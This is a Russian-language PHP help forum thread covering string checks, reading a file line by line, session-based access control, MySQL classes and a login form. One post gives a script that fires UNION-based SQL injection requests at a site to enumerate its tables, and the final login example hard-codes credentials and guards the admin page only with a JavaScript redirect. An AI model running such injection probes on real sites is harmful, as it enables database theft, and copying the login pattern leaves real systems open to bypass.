Isis, ну выебнулся так выебнулся... Ты обратил внимание, что я написал выражение с участием функции trim: PHP: if (trim($str) != '') Перевожу: ЕСЛИ ПОСЛЕ УДАЛЕНИЯ ПРОБЕЛЬНЫХ СИМВОЛОВ ИЗ СТРОКИ, СТРОКА ОСТАЛАСЬ НЕ ПУСТА, ТО ВЫПОЛНИТЬ ВЫРАЖЕНИЕ PHP: if (!empty($str)) У тебя же это банально: ЕСЛИ СТРОКА НЕ ПУСТА, ТО ВЫПОЛНИТЬ ВЫРАЖЕНИЕ В общем начинай освоение PHP c простых вещей, вроде: PHP: $var = "\r\n"; var_dump(empty($var)); а потом будешь пиздецами кидаться...
Еще если я не ошибаюсь обязательно нужно указать тип контента - Content-Type: application/x-www-form-urlencoded или multipart/form-data ...
А как считывать файл построчно, чтоб цыкл закончился вместе с концом файла???? или есть у кого код чтоб перебирать столбцы или колонки в Mysql&&&
PHP: $fd = fopen("file_name", "r"); if(!$fd) { echo "Нет файла по указанному пути"; } else { while(!feof($fd)) { $stroka = str_replace("\r\n","", fgets($fd)); add_data($stroka); // заносим строку в таблицу (функция add_data - пользовательская) } } fclose($fd);
Подскажите где ошибка, вроде всё правильно, но не находит существующие столбцы в MYSQL! <? @set_time_limit(0); $strverno=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.users+limit+1,1/*"); preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$strverno,$m); foreach($m[2] as $s){ } $fd = fopen("kol.txt", "r"); while(!feof($fd)) { $ma=trim(fgets($fd)); $str=file_get_contents("site/index.php?id=1+UNION+SELECT+1,2,3,4,5,6,7,8,9+from +pro.".$ma."+limit+1,1/*"); preg_match_all("/<a href=\"(.+)\">(.+)<\/a>/isU",$str,$p); foreach($p[2] as $k){ } if($s==$k){ echo "ok, exist"; } else { echo "error"; } } fclose($fd); ?>
PHP: foreach($m[2] as $s){ } foreach($p[2] as $k){ } а это так и должно быть что цикл открылся и сразу закрылся, не выполняя никаких действий??
Привет всем Подскажите пожалуйста как разместить <?php include("footer.inc");?> именно внизу страницы независимо от того сколько всякого на странице уже размещено - т.е. так чтоб футер всегд был только внизу страницы спасибо
2 Buffalon http://bvisoft.com/reads/263.php Вот почитай, используя mysqli можеш забыть про СКЛ-инъекты А вот общее по безопасности, мне понравилось http://www.1c-bitrix.ru/security/recommendations.php
Как осуществить авторизацию к определенным скриптам, на прямой доступ к скрипту что бы тебя отправляли на форму авторизации... Без использования .htpassw именно php скрипт... Приведите пож короткий пример, выжная часть вопроса, это как запретить доступ к опред скриптам...
например так: В каждом скрипте пишем(или же пишем в одном отдельном файле, на котором потом include поставить) Смотрим авторизован ли юзер(смотря посредством чего идет авторизация, у меня пример проверки сессии): PHP: <? session_start(); if (!isset($_SESSION['login'])){ echo "Доступ запрещен. Авторизуйтесь"; exit; }else{ //Тут можем сделать запрос в базу //Посмотреть имеет ли данный юзер доступ к скрипту //Естесственно, должна быть соответ. база } //далее сам скрипт ?>
У меня вопрос. ООП в пхп. У меня прописаны классы для работы с MySQL. Есть функции которые выполняют определенные действия и внутри себя обращаются к классам.... На денвере все нормально работало, но хостинге выскакивали ошибки, типа не возможен доступ к объекту на линии такой-то. Хотя обращался я к классу до функции($con = new MySQLconn(); ), и в самой функции естественно кидал эту переменную в GLOBAL $con .. далее обращение к экземпляру класса $result=$con->createResult($string); Собсвтенно это и вызывало ошибку. Тут подумал что это не совсем правильно, и надо убрать все функции и сделать классы которые были бы exception(наследованием) класса MySQL Стоит ли? Ведь это приводит к усложнению скрипта и времени разработки. Возможно есть какой-нибудь компромис?
Убрать все функции и сделать все классы потомками класса для работы с БД - что-то тут определённо не так. exception - это "исключение".
Проблема с написанием авторизации... есть скрипт login.php PHP: <form method="POST"> <br/> Login:<input type="text" name="log" title="Введите login" value=""> <br/> <br /> Password:<input type="text" name="passwd" title="Введите password" value=""> <br/> <br /> <input type="submit" name="sub" value=" Go! " /> <br/> <br/> </form> <?php $password="1"; $login="1"; if(isset($_POST['sub'])) { $inputlogin=$_POST['log']; $inputpassword=$_POST['passwd']; $inputlogin=trim($inputlogin); $inputpassword=trim($inputpassword); if($inputpassword==$password && $inputlogin==$login) { print ("<script>document.location='admin.php';</script>\r\n"); } else { echo "<font color=Red>Неправильный пароль</font>"; } } ?> И есть скрипт admin.php, к которому и нужно открыть доступ через Login.php и сделать запрет на прямой доступ к скриту... Каким образом запретить прямой доступ к скрипту admin.php и при прямом доступе отправлять пользователя на линк авторизации..